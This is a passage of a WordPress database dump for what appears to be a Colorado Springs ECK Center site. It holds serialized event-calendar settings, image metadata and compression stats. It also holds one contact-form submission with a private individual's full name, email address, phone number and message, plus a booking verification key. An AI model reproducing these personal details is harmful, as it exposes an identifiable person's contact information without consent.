s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:11:\"Fri.2-Fri.4\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(180646,268265,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:11:\"Fri.2-Fri.4\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(180647,268265,'mec_certain_weekdays','a:0:{}'),(180648,268265,'mec_allday','0'),(180649,268265,'mec_hide_time','0'),(180650,268265,'mec_hide_end_time','0'),(180651,268265,'mec_comment',''),(180652,268265,'mec_repeat_status','1'),(180653,268265,'mec_repeat_type','advanced'),(180654,268265,'mec_repeat_interval','1'),(180655,268265,'mec_repeat_end','never'),(180656,268265,'mec_repeat_end_at_occurrences','9'),(180657,268265,'mec_repeat_end_at_date',''),(180658,268265,'mec_advanced_days','a:2:{i:0;s:5:\"Fri.2\";i:1;s:5:\"Fri.4\";}'),(180659,268265,'mec_in_days',''),(180660,268265,'mec_not_in_days',''),(180661,268265,'mec_hourly_schedules','a:0:{}'),(180662,268265,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(192796,269146,'mec_organizer_id','1'),(192797,269146,'mec_read_more',''),(180663,268265,'mec_tickets','a:0:{}'),(180664,268265,'mec_fees_global_inheritance','1'),(180665,268265,'mec_fees','a:0:{}'),(180666,268265,'mec_ticket_variations_global_inheritance','1'),(180667,268265,'mec_ticket_variations','a:0:{}'),(180668,268265,'mec_reg_fields_global_inheritance','1'),(180669,268265,'mec_reg_fields','a:0:{}'),(180670,268265,'mec_op','a:0:{}'),(180671,268265,'mec_event_date_submit','20210422105713'),(180672,268265,'mec_read_more',''),(180673,268265,'mec_more_info',''),(180674,268265,'mec_more_info_title',''),(180675,268265,'mec_more_info_target','_self'),(180676,268265,'mec_cost',''),(180677,268265,'mec_currency','a:0:{}'),(180678,268265,'mec_additional_organizer_ids','a:0:{}'),(180679,268265,'mec_additional_location_ids','a:0:{}'),(180680,268265,'one_occurrence','0'),(180681,268265,'mec_timezone','global'),(180682,268265,'mec_countdown_method','global'),(180683,268265,'mec_public','1'),(180684,268265,'mec_bfixed_fields','a:0:{}'),(180685,268265,'mec_fields','a:0:{}'),(180686,268265,'mec_event_status','EventScheduled'),(180687,268265,'mec_moved_online_link',''),(180688,268265,'mec_cancelled_reason',''),(180689,268265,'mec_display_cancellation_reason_in_single_page',''),(180690,268265,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(180691,268265,'passster_activate_global_protection',NULL),(180692,268265,'passster_activate_protection',NULL),(180693,268265,'passster_protection_type','password'),(180694,268265,'_wp_old_date','2022-01-18'),(180695,268265,'boldgrid_in_page_containers','1'),(180696,268265,'_dp_original','265425'),(180697,268265,'_edit_lock','1696277214:2'),(180698,268265,'passster_area_shortcode',''),(180699,268265,'_edit_last','2'),(180700,268266,'_wp_attached_file','2023/03/hu-custom-1.jpg'),(180701,268266,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:798;s:6:\"height\";i:449;s:4:\"file\";s:23:\"2023/03/hu-custom-1.jpg\";s:8:\"filesize\";i:92138;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"hu-custom-1-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20761;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"hu-custom-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7680;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:23:\"hu-custom-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72926;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:23:\"hu-custom-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23245;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:23:\"hu-custom-1-500x449.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:449;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:51768;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:23:\"hu-custom-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:38821;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:23:\"hu-custom-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27928;}s:8:\"tileview\";a:5:{s:4:\"file\";s:23:\"hu-custom-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26266;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(180702,268265,'_thumbnail_id','268266'),(180703,268256,'original-file','2023/03/colorado-springs-grand-opening-updraft-pre-smush-original.jpg'),(180704,268256,'smush-complete','1'),(180705,268256,'smush-info','The file was compressed from 106.47 KB to 100.74 KB saving 5.38 percent using WP-Optimize'),(180706,268256,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:109023;s:12:\"smushed-size\";i:103156;s:15:\"savings-percent\";d:5.38;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:109023;s:10:\"compressed\";i:103156;}s:6:\"medium\";a:2:{s:8:\"original\";i:24590;s:10:\"compressed\";i:23947;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11692;s:10:\"compressed\";i:11514;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:31779;s:10:\"compressed\";i:31176;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:50499;s:10:\"compressed\";i:49397;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:37212;s:10:\"compressed\";i:36378;}s:8:\"tileview\";a:2:{s:8:\"original\";i:36147;s:10:\"compressed\";i:35523;}}}'),(180707,268259,'original-file','2023/03/body-mind-spirit-COSP-2023-updraft-pre-smush-original.jpg'),(180708,268259,'smush-complete','1'),(180709,268259,'smush-info','The file was compressed from 123.69 KB to 117.76 KB saving 4.79 percent using WP-Optimize'),(180710,268259,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:126661;s:12:\"smushed-size\";i:120588;s:15:\"savings-percent\";d:4.79;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:126661;s:10:\"compressed\";i:120588;}s:6:\"medium\";a:2:{s:8:\"original\";i:18518;s:10:\"compressed\";i:18054;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10184;s:10:\"compressed\";i:10118;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:80394;s:10:\"compressed\";i:78314;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:29819;s:10:\"compressed\";i:29158;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:47637;s:10:\"compressed\";i:46424;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:34695;s:10:\"compressed\";i:33767;}s:8:\"tileview\";a:2:{s:8:\"original\";i:33567;s:10:\"compressed\";i:32959;}}}'),(180711,268266,'original-file','2023/03/hu-custom-1-updraft-pre-smush-original.jpg'),(180712,268266,'smush-complete','1'),(180713,268266,'smush-info','The file was compressed from 89.10 KB to 87.03 KB saving 2.32 percent using WP-Optimize'),(180714,268266,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:91242;s:12:\"smushed-size\";i:89122;s:15:\"savings-percent\";d:2.32;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:91242;s:10:\"compressed\";i:89122;}s:6:\"medium\";a:2:{s:8:\"original\";i:16132;s:10:\"compressed\";i:16096;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7636;s:10:\"compressed\";i:7636;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:72051;s:10:\"compressed\";i:71899;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:23042;s:10:\"compressed\";i:23038;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:38458;s:10:\"compressed\";i:38391;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:27732;s:10:\"compressed\";i:27616;}s:8:\"tileview\";a:2:{s:8:\"original\";i:26028;s:10:\"compressed\";i:26028;}}}'),(188200,268837,'mec_end_time_hour','2'),(188201,268837,'mec_end_time_minutes','30'),(188199,268837,'mec_end_date','2023-08-16'),(180717,268268,'_wp_attached_file','2023/03/spring23-1.jpg'),(180718,268268,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1919;s:6:\"height\";i:1080;s:4:\"file\";s:22:\"2023/03/spring23-1.jpg\";s:8:\"filesize\";i:708439;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"spring23-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25217;}s:5:\"large\";a:5:{s:4:\"file\";s:23:\"spring23-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216616;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"spring23-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11758;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:22:\"spring23-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:131571;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"spring23-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40626;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"spring23-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:67066;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"spring23-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:46462;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"spring23-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:50580;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:23:\"spring23-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:420078;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(182336,268436,'_form_id','35'),(182335,268436,'_field_316','Hello, I have been looking more into the subject of Astral projection and wanted to ask if there is a Colorado Springs ECK Center or regular hours/ meeting times?'),(182969,268465,'mec_verification_key','4da6e73917e67a48e29e56ab9d421e09'),(182333,268436,'_field_314','Jeromedepner@bellaventuresllc.com'),(182334,268436,'_field_315','Astral Travel'),(191751,269082,'original-file','2023/09/web-promo-bk-5-updraft-pre-smush-original.jpg'),(191752,269082,'smush-complete','1'),(191753,269082,'smush-info','The file was compressed from 160.98 KB to 154.75 KB, saving 3.87 percent, using WP-Optimize'),(191754,269082,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:164846;s:12:\"smushed-size\";i:158464;s:15:\"savings-percent\";d:3.87000000000000010658141036401502788066864013671875;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:164846;s:10:\"compressed\";i:158464;}s:6:\"medium\";a:2:{s:8:\"original\";i:15407;s:10:\"compressed\";i:15206;}s:5:\"large\";a:2:{s:8:\"original\";i:104333;s:10:\"compressed\";i:102685;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7554;s:10:\"compressed\";i:7488;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:62382;s:10:\"compressed\";i:61201;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:25379;s:10:\"compressed\";i:25154;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:60839;s:10:\"compressed\";i:59907;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:45214;s:10:\"compressed\";i:44555;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:31520;s:10:\"compressed\";i:31001;}s:8:\"tileview\";a:2:{s:8:\"original\";i:29677;s:10:\"compressed\";i:29546;}}}'),(182966,268465,'mec_transaction_id','AUX15539'),(182967,268465,'mec_user_id','1000081'),(182968,268465,'mec_verified','1'),(182330,268436,'_field_312','Jerome'),(191749,269082,'_wp_attached_file','2023/09/web-promo-bk-5.jpg'),(191750,269082,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1183;s:6:\"height\";i:417;s:4:\"file\";s:26:\"2023/09/web-promo-bk-5.jpg\";s:8:\"filesize\";i:164846;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-5-350x123.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:123;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15407;}s:5:\"large\";a:5:{s:4:\"file\";s:27:\"web-promo-bk-5-1024x361.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:361;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104333;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7554;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-5-768x271.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:271;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:62382;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25379;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-5-500x417.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:417;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60839;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-5-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:45214;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31520;}s:8:\"tileview\";a:5:{s:4:\"file\";s:26:\"web-promo-bk-5-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29677;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(180747,268268,'original-file','2023/03/spring23-1-updraft-pre-smush-original.jpg'),(180748,268268,'smush-complete','1'),(180749,268268,'smush-info','The file was compressed from 691.83 KB to 651.13 KB saving 5.88 percent using WP-Optimize'),(180750,268268,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:708439;s:12:\"smushed-size\";i:666752;s:15:\"savings-percent\";d:5.88;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:708439;s:10:\"compressed\";i:666752;}s:6:\"medium\";a:2:{s:8:\"original\";i:25217;s:10:\"compressed\";i:24299;}s:5:\"large\";a:2:{s:8:\"original\";i:216616;s:10:\"compressed\";i:208388;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:11758;s:10:\"compressed\";i:11420;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:131571;s:10:\"compressed\";i:126364;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:40626;s:10:\"compressed\";i:39057;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:67066;s:10:\"compressed\";i:64475;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:46462;s:10:\"compressed\";i:44686;}s:8:\"tileview\";a:2:{s:8:\"original\";i:50580;s:10:\"compressed\";i:48610;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:420078;s:10:\"compressed\";i:405282;}}}'),(182332,268436,'_field_333','7192905806'),(182331,268436,'_field_313','Depner'),(180753,266688,'passster_area_shortcode',''),(180754,268279,'mec_color',''),(180755,268279,'mec_location_id','122'),(180756,268279,'mec_dont_show_map','0'),(180757,268279,'mec_organizer_id','1'),(180758,268279,'mec_read_more',''),(180759,268279,'mec_more_info',''),(180760,268279,'mec_more_info_title',''),(180761,268279,'mec_more_info_target','_self'),(180762,268279,'mec_cost',''),(180763,268279,'mec_currency','a:0:{}'),(180764,268279,'mec_additional_organizer_ids','a:0:{}'),(180765,268279,'mec_additional_location_ids','a:0:{}'),(180766,268279,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-23\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-23\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(180767,268279,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(180768,268279,'mec_certain_weekdays','a:0:{}'),(180769,268279,'mec_allday','0'),(180770,268279,'one_occurrence','0'),(180771,268279,'mec_hide_time','0'),(180772,268279,'mec_hide_end_time','0'),(180773,268279,'mec_comment',''),(180774,268279,'mec_timezone','global'),(180775,268279,'mec_countdown_method','global'),(180776,268279,'mec_public','1'),(180777,268279,'mec_start_date','2023-04-23'),(180778,268279,'mec_start_time_hour','10'),(180779,268279,'mec_start_time_minutes','30'),(180780,268279,'mec_start_time_ampm','AM'),(180781,268279,'mec_start_day_seconds','37800'),(180782,268279,'mec_end_date','2023-04-23'),(180783,268279,'mec_end_time_hour','11'),(180784,268279,'mec_end_time_minutes','30'),(180785,268279,'mec_end_time_ampm','AM'),(180786,268279,'mec_end_day_seconds','41400'),(180787,268279,'mec_repeat_status','0'),(180788,268279,'mec_repeat_type',''),(180789,268279,'mec_repeat_interval','1'),(180790,268279,'mec_repeat_end',''),(180791,268279,'mec_repeat_end_at_occurrences',''),(180792,268279,'mec_repeat_end_at_date',''),(180793,268279,'mec_advanced_days','a:0:{}'),(180794,268279,'mec_in_days',''),(180795,268279,'mec_not_in_days',''),(180796,268279,'mec_hourly_schedules','a:0:{}'),(180797,268279,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(180798,268279,'mec_tickets','a:0:{}'),(180799,268279,'mec_fees_global_inheritance','1'),(180800,268279,'mec_fees','a:0:{}'),(180801,268279,'mec_ticket_variations_global_inheritance','1'),(180802,268279,'mec_ticket_variations','a:0:{}'),(180803,268279,'mec_reg_fields_global_inheritance','1'),(180804,268279,'mec_reg_fields','a:0:{}'),(180805,268279,'mec_bfixed_fields','a:0:{}'),(180806,268279,'mec_op','a:0:{}'),(180807,268279,'mec_fields','a:0:{}'),(180808,268279,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(180809,268279,'mec_event_status','EventScheduled'),(180810,268279,'mec_moved_online_link',''),(180811,268279,'mec_cancelled_reason',''),(180812,268279,'mec_display_cancellation_reason_in_single_page',''),(180813,268279,'protect_children',''),(180814,268279,'passster_activate_global_protection',NULL),(180815,268279,'passster_activate_protection',NULL),(180816,268279,'passster_protection_type','password'),(180817,268279,'boldgrid_hide_page_title','0'),(180818,268279,'_thumbnail_id','268280'),(180821,268279,'_dp_original','266311'),(180820,268279,'boldgrid_in_page_containers','1'),(180822,268279,'_edit_lock','1682292022:15'),(180823,268279,'passster_area_shortcode',''),(180824,268279,'_edit_last','2'),(180825,268280,'_wp_attached_file','2023/03/beach-5.jpg'),(180826,268280,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:800;s:6:\"height\";i:450;s:4:\"file\";s:19:\"2023/03/beach-5.jpg\";s:8:\"filesize\";i:173670;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"beach-5-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21241;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"beach-5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9462;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"beach-5-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:123584;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:19:\"beach-5-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:35408;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:19:\"beach-5-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:60511;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:19:\"beach-5-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:40843;}s:8:\"tileview\";a:5:{s:4:\"file\";s:19:\"beach-5-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:43884;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(180827,268280,'original-file','2023/03/beach-5-updraft-pre-smush-original.jpg'),(180828,268280,'smush-complete','1'),(180829,268280,'smush-info','The file was compressed from 169.60 KB to 159.22 KB saving 6.12 percent using 